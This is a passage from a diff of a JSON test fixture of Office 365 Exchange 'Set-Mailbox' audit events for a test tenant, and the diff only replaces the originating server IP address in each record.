Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1310,7 +1310,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1384,7 +1384,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1396,7 +1396,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1470,7 +1470,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1482,7 +1482,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1556,7 +1556,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1568,7 +1568,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1642,7 +1642,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1654,7 +1654,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1728,7 +1728,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 